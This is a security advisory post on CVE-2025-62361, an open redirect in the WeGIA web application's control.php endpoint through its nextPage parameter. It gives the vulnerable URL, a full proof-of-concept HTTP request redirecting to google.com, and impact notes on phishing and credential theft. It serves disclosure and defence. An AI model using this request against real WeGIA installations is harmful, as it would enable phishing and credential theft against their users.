Featured image of post CVE-2025-62361
Open Redirect Moderate WeGia Security WebApp

CVE-2025-62361

Open Redirect

CVE-2025-62361: Open Redirect Vulnerability in control.php endpoint nextPage parameter

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-62361

Summary

An Open Redirect vulnerability was identified in the control.php endpoint of the WeGIA application, specifically in the nextPage parameter (metodo=listarTodos nomeClasse=AlmoxarifeControle).

This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.

Details

The application fails to validate and sanitize user input in the nextPage parameter.

As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.

Vulnerable Endpoint: GET /WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=

Parameter: nextPage

PoC

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

GET /WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=https%3A%2F%2Fgoogle.com HTTP/1.1
Host: sec.wegia.org:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Referer: https://sec.wegia.org:8000/WeGIA/html/geral/editar_permissoes.php
Connection: keep-alive
Cookie: {COOKIE}
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

The server accepts the crafted request and successfully redirects the victim to https://google.com instead of restricting navigation to the application’s own domain.

Impact

  • Phishing: Attackers can trick users into visiting malicious sites that mimic legitimate ones.
  • Credential theft: Fake login pages can capture user credentials.
  • Malware distribution: Victims may be redirected to websites hosting malicious software.
  • Reputation damage: Users may lose trust in the Wegia platform if abused in phishing campaigns.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx

Finder

Marcelo Queiroz

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy